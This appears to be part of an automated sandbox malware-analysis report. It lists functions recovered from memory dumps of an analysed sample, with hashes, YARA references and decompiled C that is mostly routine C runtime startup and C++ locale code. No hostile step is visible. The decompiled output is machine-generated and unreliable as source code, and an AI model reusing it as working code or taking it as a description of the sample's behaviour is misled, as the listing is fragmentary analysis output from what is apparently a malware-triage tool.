                                            Function 00F19FE0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c621f0b23a7576de42909dfb0cde1ce52f12fc7c8c1a0a5e0b5fe1d9e2bb3d6
                                            • Instruction ID: 0c5249c4b21c18799cdcdfe63cb50ee60e968f60cffe8e9904ac372ac692ef52
                                            • Opcode Fuzzy Hash: 1c621f0b23a7576de42909dfb0cde1ce52f12fc7c8c1a0a5e0b5fe1d9e2bb3d6
                                            • Instruction Fuzzy Hash: 7190027135115402D21061599404706100597D1351F61C421A4815558E86D58891B162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F1A3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1022e7304b7940fe214942ab5e220dea39e9548f5640ef2b0ec5b6266cb62eed
                                            • Instruction ID: 53d0e82ceace1c7435e7dd707eed0f34a03c3096bbb41c77958906aa37d7a7fa
                                            • Opcode Fuzzy Hash: 1022e7304b7940fe214942ab5e220dea39e9548f5640ef2b0ec5b6266cb62eed
                                            • Instruction Fuzzy Hash: 5890027124145002D2407159944460B6005A7E0351F61C421E4416554D86558856F261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f854a1e0a1f01f8f7b2a0bdad2517b1d99877bceffd279d07609d9cc1d0b948d
                                            • Instruction ID: 4a564f612daefe92b154eb2cf7de81e2b346ad4b5c13ed223a099650d22d2b98
                                            • Opcode Fuzzy Hash: f854a1e0a1f01f8f7b2a0bdad2517b1d99877bceffd279d07609d9cc1d0b948d
                                            • Instruction Fuzzy Hash: 1390026128101802D240715994147071006D7D0751F61C021A4015554E86568965B6F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19670, Relevance: .0, Instructions: 2COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: b5c775a5071e489fddfc4fe6e18d1d5765718b850ff8b54646ec316933a8b009
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0030E3B4, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0030E3B4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				signed int _v32;
				intOrPtr _v40;
				void* _t19;
				signed int _t20;
				intOrPtr _t29;
				signed int _t31;
				signed int _t33;
				void* _t39;
				intOrPtr _t40;
				void* _t49;
				signed int _t50;
				void* _t63;
				void* _t64;
				void* _t65;
				signed int _t66;

				_t65 = __esi;
				_t64 = __edi;
				_t63 = __edx;
				_t49 = __ebx;
				while(1) {
					_t19 = E0030FA82(_t49, _t63, _t64, _a4);
					if(_t19 != 0) {
						break;
					}
					_t20 = E00316930(_t19, _a4);
					__eflags = _t20;
					if(_t20 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E0030D35C( &_v20,  &_v8);
						_v20 = 0x326154;
						E0030F4FA( &_v20, 0x32cb98);
						asm("int3");
						_push(0x14);
						_push(0x32cca8);
						E00316090(_t49, _t64, _t65);
						_t66 = E003121EA() & 0x0000ffff;
						E003179FB(2);
						__eflags =  *0x300000 - 0x5a4d; // 0x5a4d
						if(__eflags == 0) {
							_t29 =  *0x30003c; // 0xe8
							__eflags =  *((intOrPtr*)(_t29 + 0x300000)) - 0x4550;
							if( *((intOrPtr*)(_t29 + 0x300000)) != 0x4550) {
								goto L6;
							} else {
								__eflags =  *((intOrPtr*)(_t29 + 0x300018)) - 0x10b;
								if( *((intOrPtr*)(_t29 + 0x300018)) != 0x10b) {
									goto L6;
								} else {
									_t50 = 0;
									__eflags =  *((intOrPtr*)(_t29 + 0x300074)) - 0xe;
									if( *((intOrPtr*)(_t29 + 0x300074)) > 0xe) {
										__eflags =  *(_t29 + 0x3000e8);
										_t13 =  *(_t29 + 0x3000e8) != 0;
										__eflags = _t13;
										_t50 = 0 | _t13;
									}
								}
							}
						} else {
							L6:
							_t50 = 0;
						}
						_v32 = _t50;
						__eflags = E00315367();
						if(__eflags == 0) {
							E0030E555(0x1c);
						}
						_t31 = E00315FBD(_t50, _t64, __eflags);
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E0030E555(0x10);
						}
						E003164DB(_t31);
						_v8 = _v8 & 0x00000000;
						_t33 = E00317428(_t50, _t64, _t66, __eflags);
						__eflags = _t33;
						if(_t33 < 0) {
							E0030E555(0x1b);
						}
						 *0x334b28 = GetCommandLineW();
						 *0x331ca8 = E00317AE4();
						__eflags = E003176DC();
						if(__eflags < 0) {
							_t36 = E0030E0FD(_t50, _t63, _t64, _t66, __eflags, 8);
						}
						__eflags = E00317919(_t36, _t50, _t63, _t64, _t66);
						if(__eflags < 0) {
							E0030E0FD(_t50, _t63, _t64, _t66, __eflags, 9);
						}
						__eflags = E0030E137(1);
						if(__eflags != 0) {
							E0030E0FD(_t50, _t63, _t64, _t66, __eflags, _t38);
						}
						_t39 = E00317B41();
						_push(_t66);
						_push(_t39);
						_push(0);
						_push(0x300000);
						_t40 = L003024B0(_t50, _t64, __eflags);
						_t67 = _t40;
						_v40 = _t40;
						__eflags = _t50;
						if(_t50 == 0) {
							E0030E3A0(_t67);
						}
						E0030E128();
						_v8 = 0xfffffffe;
						return E003160D5(_t67);
					} else {
						continue;
					}
					L27:
				}
				return _t19;
				goto L27;
			}




















                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3b4
                                            0x0030e3c9
                                            0x0030e3cc
                                            0x0030e3d4
                                            0x00000000
                                            0x00000000
                                            0x0030e3bf
                                            0x0030e3c5
                                            0x0030e3c7
                                            0x0030e3da
                                            0x0030e3df
                                            0x0030e3ea
                                            0x0030e3f7
                                            0x0030e3ff
                                            0x0030e404
                                            0x0030e405
                                            0x0030e407
                                            0x0030e40c
                                            0x0030e416
                                            0x0030e41b
                                            0x0030e426
                                            0x0030e42d
                                            0x0030e433
                                            0x0030e438
                                            0x0030e442
                                            0x00000000
                                            0x0030e444
                                            0x0030e449
                                            0x0030e450
                                            0x00000000
                                            0x0030e452
                                            0x0030e452
                                            0x0030e454
                                            0x0030e45b
                                            0x0030e45d
                                            0x0030e463
                                            0x0030e463
                                            0x0030e463
                                            0x0030e463
                                            0x0030e45b
                                            0x0030e450
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e42f
                                            0x0030e466
                                            0x0030e46e
                                            0x0030e470
                                            0x0030e474
                                            0x0030e479
                                            0x0030e47a
                                            0x0030e47f
                                            0x0030e481
                                            0x0030e485
                                            0x0030e48a
                                            0x0030e48b
                                            0x0030e490
                                            0x0030e494
                                            0x0030e499
                                            0x0030e49b
                                            0x0030e49f
                                            0x0030e4a4
                                            0x0030e4ab
                                            0x0030e4b5
                                            0x0030e4bf
                                            0x0030e4c1
                                            0x0030e4c5
                                            0x0030e4ca
                                            0x0030e4d0
                                            0x0030e4d2
                                            0x0030e4d6
                                            0x0030e4db
                                            0x0030e4e4
                                            0x0030e4e6
                                            0x0030e4e9
                                            0x0030e4ee
                                            0x0030e4ef
                                            0x0030e4f4
                                            0x0030e4f5
                                            0x0030e4f6
                                            0x0030e4f8
                                            0x0030e4fd
                                            0x0030e502
                                            0x0030e504
                                            0x0030e507
                                            0x0030e509
                                            0x0030e50c
                                            0x0030e50c
                                            0x0030e511
                                            0x0030e546
                                            0x0030e554
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0030e3c7
                                            0x0030e3d9
                                            0x00000000

                                            APIs
                                            • _malloc.LIBCMT ref: 0030E3CC
                                              • Part of subcall function 0030FA82: __FF_MSGBANNER.LIBCMT ref: 0030FA99
                                              • Part of subcall function 0030FA82: __NMSG_WRITE.LIBCMT ref: 0030FAA0
                                              • Part of subcall function 0030FA82: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000001,00000050,00000050,?,0030D41B,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030FAC5
                                            • std::exception::exception.LIBCMT ref: 0030E3EA
                                            • __CxxThrowException@8.LIBCMT ref: 0030E3FF
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            • ___crtGetShowWindowMode.LIBCMT ref: 0030E411
                                              • Part of subcall function 003121EA: GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0030E416,0032CCA8,00000014,00000051,0032CB98), ref: 003121F4
                                            • _fast_error_exit.LIBCMT ref: 0030E474
                                            • _fast_error_exit.LIBCMT ref: 0030E485
                                            • __RTC_Initialize.LIBCMT ref: 0030E48B
                                            • __ioinit.LIBCMT ref: 0030E494
                                            • _fast_error_exit.LIBCMT ref: 0030E49F
                                            • GetCommandLineW.KERNEL32(0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E4A5
                                            • ___crtGetEnvironmentStringsW.LIBCMT ref: 0030E4B0
                                            • __wsetargv.LIBCMT ref: 0030E4BA
                                            • __wsetenvp.LIBCMT ref: 0030E4CB
                                            • __cinit.LIBCMT ref: 0030E4DE
                                            • __wwincmdln.LIBCMT ref: 0030E4EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _fast_error_exit$___crt$AllocCommandEnvironmentExceptionException@8HeapInfoInitializeLineModeRaiseShowStartupStringsThrowWindow__cinit__ioinit__wsetargv__wsetenvp__wwincmdln_mallocstd::exception::exception
                                            • String ID: Ta2$\a2
                                            • API String ID: 1274217231-2893594904
                                            • Opcode ID: 42236bebc973260eb35834c64a3f791c2aeb7c301160c949b6dcd38788296cf6
                                            • Instruction ID: a8b5f50910e59ede06034b124f5b0543a44fe6c2953130dc22ddb1d8c82f1f7d
                                            • Opcode Fuzzy Hash: 42236bebc973260eb35834c64a3f791c2aeb7c301160c949b6dcd38788296cf6
                                            • Instruction Fuzzy Hash: AC3105347033159ADB2BBBB5DD73BAE3668AF04314F104C69F9049E1C2EFB0DA858691
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003088A3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E003088A3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				void* _t22;
				void* _t39;
				intOrPtr* _t41;
				void* _t44;

				_push(0x14);
				E0030F580(E00324705, __ebx, __edi, __esi);
				E003099F7(_t44 - 0x14, 0);
				_t41 =  *0x331a18; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t41;
				_t17 = E00301430( *((intOrPtr*)(_t44 + 8)), E00301380(0x331a10));
				_t43 = _t17;
				if(_t17 == 0) {
					if(_t41 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t22 = E00308C5A(__ebx, _t39, _t41, _t43, __eflags);
						__eflags = _t22 - 0xffffffff;
						if(_t22 == 0xffffffff) {
							E0030D31B(_t44 - 0x20, "bad cast");
							E0030F4FA(_t44 - 0x20, 0x32d290);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x331a18 = _t43;
						 *((intOrPtr*)( *_t43 + 4))();
						E00308645(_t43);
					} else {
						_t43 = _t41;
					}
				}
				E00309A52(_t44 - 0x14);
				return E0030F55D(_t43);
			}








                                            0x003088a3
                                            0x003088aa
                                            0x003088b4
                                            0x003088b9
                                            0x003088c4
                                            0x003088c8
                                            0x003088d4
                                            0x003088d9
                                            0x003088dd
                                            0x003088e1
                                            0x003088e7
                                            0x003088ed
                                            0x003088ee
                                            0x003088f5
                                            0x003088f8
                                            0x00308902
                                            0x00308910
                                            0x00308910
                                            0x00308915
                                            0x0030891a
                                            0x00308922
                                            0x00308926
                                            0x003088e3
                                            0x003088e3
                                            0x003088e3
                                            0x003088e1
                                            0x0030892f
                                            0x0030893b

                                            APIs
                                            • __EH_prolog3.LIBCMT ref: 003088AA
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003088B4
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • int.LIBCPMT ref: 003088CB
                                              • Part of subcall function 00301380: std::_Lockit::_Lockit.LIBCPMT ref: 00301391
                                            • codecvt.LIBCPMT ref: 003088EE
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00308902
                                            • __CxxThrowException@8.LIBCMT ref: 00308910
                                            • std::_Facet_Register.LIBCPMT ref: 00308926
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                            • String ID: bad cast
                                            • API String ID: 1512642153-3145022300
                                            • Opcode ID: fc25063d6570cb2574c8e80896bc278539971771033590762338ee2c689a5384
                                            • Instruction ID: 7a196ecc46ef4a0e31ff4c726355fa7bd53efdae4e3b15cbc597a05a71d7cb0b
                                            • Opcode Fuzzy Hash: fc25063d6570cb2574c8e80896bc278539971771033590762338ee2c689a5384
                                            • Instruction Fuzzy Hash: E901AD369022288BCB03FBA4C872AAD7378AF04320F610529F4516B1D2DF749A008791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00301AD0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 00301B1E
                                            • __CxxThrowException@8.LIBCMT ref: 00301B3B
                                            • __CxxThrowException@8.LIBCMT ref: 00301B54
                                            • __CxxThrowException@8.LIBCMT ref: 00301B6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 2005118841-1866435925
                                            • Opcode ID: 152b771f20ab46d03f78a3f394bae7cbc302dc9f6889e5d1ae1e217c51fcaed9
                                            • Instruction ID: 18883178a696f903eb9789b76438e129efb987baf87c4abbbe015e50a4bb31c8
                                            • Opcode Fuzzy Hash: 152b771f20ab46d03f78a3f394bae7cbc302dc9f6889e5d1ae1e217c51fcaed9
                                            • Instruction Fuzzy Hash: E8014530206305ABD712EF64C833FEAB3D8AB80740F008C1CF99AAA4C1EB74E4088756
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307270, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 242COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00307270(intOrPtr __edx, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr _v76;
				signed int _v88;
				char _v92;
				void* _t81;
				intOrPtr _t88;
				signed int _t90;
				signed int _t95;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t121;
				signed int _t126;
				signed int _t127;
				char _t128;
				signed int _t129;
				intOrPtr _t132;
				void* _t137;
				signed int _t140;
				intOrPtr _t153;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr _t161;
				signed int _t162;
				void* _t166;
				intOrPtr _t167;
				void* _t171;

				_t153 = __edx;
				E003099F7( &_v16, 0);
				_t156 =  *0x331934; // 0x0
				_t128 =  *0x333a4c;
				_v8 = _t128;
				if(_t156 == 0) {
					E003099F7( &_v12, _t156);
					_t171 =  *0x331934 - _t156; // 0x0
					if(_t171 == 0) {
						_t126 =  *0x331924; // 0x0
						_t127 = _t126 + 1;
						 *0x331924 = _t127;
						 *0x331934 = _t127;
					}
					E00309A52( &_v12);
					_t156 =  *0x331934; // 0x0
				}
				_t132 =  *_a4;
				if(_t156 >=  *((intOrPtr*)(_t132 + 0xc))) {
					_t159 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 8)) + _t156 * 4));
					if(_t159 != 0) {
						L16:
						E00309A52( &_v16);
						return _t159;
					} else {
						L8:
						if( *((char*)(_t132 + 0x14)) == 0) {
							L11:
							if(_t159 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t121 = E0030866D();
							if(_t156 >=  *((intOrPtr*)(_t121 + 0xc))) {
								L12:
								if(_t128 == 0) {
									_t81 = E00301470(_t153,  &_v8, _a4);
									_t167 = _t166 + 8;
									__eflags = _t81 - 0xffffffff;
									if(_t81 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(0xffffffff);
										_push(E003246A0);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t167;
										_push(_t128);
										_push(_t159);
										_push(_t156);
										_v60 = _t167 - 0x28;
										_v76 = _t153;
										_t160 = 0x3319c0;
										_v64 = 0x3319c0;
										_t129 = 0;
										_v68 = 0;
										E00303930( &_v92, 0x3319c0);
										__eflags = _v88;
										if(_v88 != 0) {
											_t97 =  *0x3319c0; // 0x0
											_t98 =  *((intOrPtr*)(_t97 + 4));
											_t161 =  *((intOrPtr*)(_t98 + 0x3319e0));
											_t158 =  *(_t98 + 0x3319e4);
											__eflags = _t158;
											if(__eflags > 0) {
												L23:
												_t162 = _t161 - 1;
												asm("sbb edi, ebx");
											} else {
												if(__eflags < 0) {
													L22:
													asm("xorps xmm0, xmm0");
													asm("movlpd [ebp-0x28], xmm0");
													_t158 = _v44;
													_t162 = _v48;
												} else {
													__eflags = _t161 - 1;
													if(_t161 > 1) {
														goto L23;
													} else {
														goto L22;
													}
												}
											}
											_v12 = 0;
											_t99 =  *0x3319c0; // 0x0
											_t100 =  *((intOrPtr*)(_t99 + 4));
											__eflags = ( *(_t100 + 0x3319d4) & 0x000001c0) - 0x40;
											if(( *(_t100 + 0x3319d4) & 0x000001c0) == 0x40) {
												L30:
												__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + _v28 + 0x38)), _v40) - 0xffffffff;
												_t129 =  ==  ? 4 : _t129;
												_v32 = _t129;
												while(1) {
													__eflags = _t129;
													if(_t129 != 0) {
														goto L36;
													}
													__eflags = _t158;
													if(__eflags >= 0) {
														if(__eflags > 0) {
															L35:
															_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x331a00));
															__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x3319f8)), _v40) - 0xffffffff;
															_t129 =  ==  ? 4 : _t129;
															_v32 = _t129;
															_t162 = _t162 + 0xffffffff;
															_v48 = _t162;
															asm("adc edi, 0xffffffff");
															_v44 = _t158;
															continue;
														} else {
															__eflags = _t162;
															if(_t162 != 0) {
																goto L35;
															}
														}
													}
													goto L36;
												}
											} else {
												while(1) {
													__eflags = _t129;
													if(_t129 != 0) {
														goto L36;
													}
													__eflags = _t158;
													if(__eflags < 0) {
														goto L30;
													} else {
														if(__eflags > 0) {
															L29:
															_v36 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x331a00));
															__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x3319f8)), _v36) - 0xffffffff;
															_t129 =  ==  ? 4 : _t129;
															_v32 = _t129;
															_t162 = _t162 + 0xffffffff;
															_v48 = _t162;
															asm("adc edi, 0xffffffff");
															_v44 = _t158;
															continue;
														} else {
															__eflags = _t162;
															if(_t162 == 0) {
																goto L30;
															} else {
																goto L29;
															}
														}
													}
													goto L36;
												}
											}
											L36:
											_v12 = 0xffffffff;
											_t160 = _v28;
										}
										_t88 =  *((intOrPtr*)( *_t160 + 4));
										 *((intOrPtr*)(_t88 + _t160 + 0x20)) = 0;
										 *((intOrPtr*)(_t88 + _t160 + 0x24)) = 0;
										_t137 =  *((intOrPtr*)( *_t160 + 4)) + _t160;
										__eflags = _t129;
										if(__eflags != 0) {
											_t95 =  *(_t137 + 0xc) | _t129;
											__eflags =  *(_t137 + 0x38);
											if( *(_t137 + 0x38) == 0) {
												__eflags = _t95;
											}
											_push(0);
											E00301AD0(_t137, _t95);
										}
										_t90 = L00309A76(__eflags);
										_t157 = _v56;
										__eflags = _t90;
										if(_t90 == 0) {
											E003043E0(_t157);
										}
										_t140 =  *( *((intOrPtr*)( *_t157 + 4)) + _t157 + 0x38);
										__eflags = _t140;
										if(_t140 != 0) {
											 *((intOrPtr*)( *_t140 + 8))();
										}
										 *[fs:0x0] = _v20;
										return _t160;
									} else {
										_t159 = _v8;
										 *0x333a4c = _t159;
										 *((intOrPtr*)( *_t159 + 4))();
										E00308645(_t159);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t128;
								}
							} else {
								_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 8)) + _t156 * 4));
								goto L11;
							}
						}
					}
				}
			}















































                                            0x00307270
                                            0x0030727e
                                            0x00307283
                                            0x00307289
                                            0x0030728f
                                            0x00307294
                                            0x0030729a
                                            0x0030729f
                                            0x003072a5
                                            0x003072a7
                                            0x003072ac
                                            0x003072ad
                                            0x003072b2
                                            0x003072b2
                                            0x003072ba
                                            0x003072bf
                                            0x003072bf
                                            0x003072c8
                                            0x003072cd
                                            0x003072db
                                            0x003072db
                                            0x00000000
                                            0x003072cf
                                            0x003072d2
                                            0x003072d7
                                            0x0030733b
                                            0x0030733e
                                            0x0030734b
                                            0x003072d9
                                            0x003072dd
                                            0x003072e1
                                            0x003072f3
                                            0x003072f5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003072e3
                                            0x003072e3
                                            0x003072eb
                                            0x003072f7
                                            0x003072f9
                                            0x00307315
                                            0x0030731a
                                            0x0030731d
                                            0x00307320
                                            0x00307354
                                            0x00307362
                                            0x00307367
                                            0x00307368
                                            0x00307369
                                            0x0030736a
                                            0x0030736b
                                            0x0030736c
                                            0x0030736d
                                            0x0030736e
                                            0x0030736f
                                            0x00307373
                                            0x00307375
                                            0x00307380
                                            0x00307381
                                            0x0030738b
                                            0x0030738c
                                            0x0030738d
                                            0x0030738e
                                            0x00307391
                                            0x00307394
                                            0x00307399
                                            0x0030739c
                                            0x0030739e
                                            0x003073a5
                                            0x003073aa
                                            0x003073ad
                                            0x003073b3
                                            0x003073b8
                                            0x003073bb
                                            0x003073c1
                                            0x003073c7
                                            0x003073c9
                                            0x003073e2
                                            0x003073e2
                                            0x003073e5
                                            0x003073cb
                                            0x003073cb
                                            0x003073d2
                                            0x003073d2
                                            0x003073d5
                                            0x003073da
                                            0x003073dd
                                            0x003073cd
                                            0x003073cd
                                            0x003073d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003073d0
                                            0x003073cb
                                            0x003073e7
                                            0x003073ee
                                            0x003073f3
                                            0x00307401
                                            0x00307404
                                            0x00307453
                                            0x00307467
                                            0x0030746f
                                            0x00307472
                                            0x00307475
                                            0x00307475
                                            0x00307477
                                            0x00000000
                                            0x00000000
                                            0x00307479
                                            0x0030747b
                                            0x0030747d
                                            0x00307483
                                            0x00307491
                                            0x003074a2
                                            0x003074aa
                                            0x003074ad
                                            0x003074b0
                                            0x003074b3
                                            0x003074b6
                                            0x003074b9
                                            0x00000000
                                            0x0030747f
                                            0x0030747f
                                            0x00307481
                                            0x00000000
                                            0x00000000
                                            0x00307481
                                            0x0030747d
                                            0x00000000
                                            0x0030747b
                                            0x00000000
                                            0x00307406
                                            0x00307406
                                            0x00307408
                                            0x00000000
                                            0x00000000
                                            0x0030740e
                                            0x00307410
                                            0x00000000
                                            0x00307412
                                            0x00307412
                                            0x00307418
                                            0x00307426
                                            0x00307437
                                            0x0030743f
                                            0x00307442
                                            0x00307445
                                            0x00307448
                                            0x0030744b
                                            0x0030744e
                                            0x00000000
                                            0x00307414
                                            0x00307414
                                            0x00307416
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307416
                                            0x00307412
                                            0x00000000
                                            0x00307410
                                            0x00307406
                                            0x003074be
                                            0x003074be
                                            0x003074fa
                                            0x003074fa
                                            0x003074ff
                                            0x00307502
                                            0x0030750a
                                            0x00307517
                                            0x00307519
                                            0x0030751b
                                            0x00307520
                                            0x00307522
                                            0x00307526
                                            0x00307528
                                            0x00307528
                                            0x0030752b
                                            0x0030752e
                                            0x0030752e
                                            0x00307533
                                            0x00307538
                                            0x0030753b
                                            0x0030753d
                                            0x00307541
                                            0x00307541
                                            0x0030754b
                                            0x0030754f
                                            0x00307551
                                            0x00307555
                                            0x00307555
                                            0x0030755d
                                            0x0030756a
                                            0x00307322
                                            0x00307322
                                            0x00307327
                                            0x0030732f
                                            0x00307333
                                            0x00000000
                                            0x00307338
                                            0x003072fb
                                            0x00307300
                                            0x0030730d
                                            0x0030730d
                                            0x003072ed
                                            0x003072f0
                                            0x00000000
                                            0x003072f0
                                            0x003072eb
                                            0x003072e1
                                            0x003072d7

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030727E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030729A
                                            • std::_Facet_Register.LIBCPMT ref: 00307333
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307354
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307362
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: 0ffbf8b36293d82ad8b5ff8dc2f7eb5e9be5d6b9ed4ae0c3cf34a8360f9d7f5c
                                            • Instruction ID: a8c0a4bad6e997c8e2ef14f9ac564409651badf9cbb70ac5ccfde66041c67daa
                                            • Opcode Fuzzy Hash: 0ffbf8b36293d82ad8b5ff8dc2f7eb5e9be5d6b9ed4ae0c3cf34a8360f9d7f5c
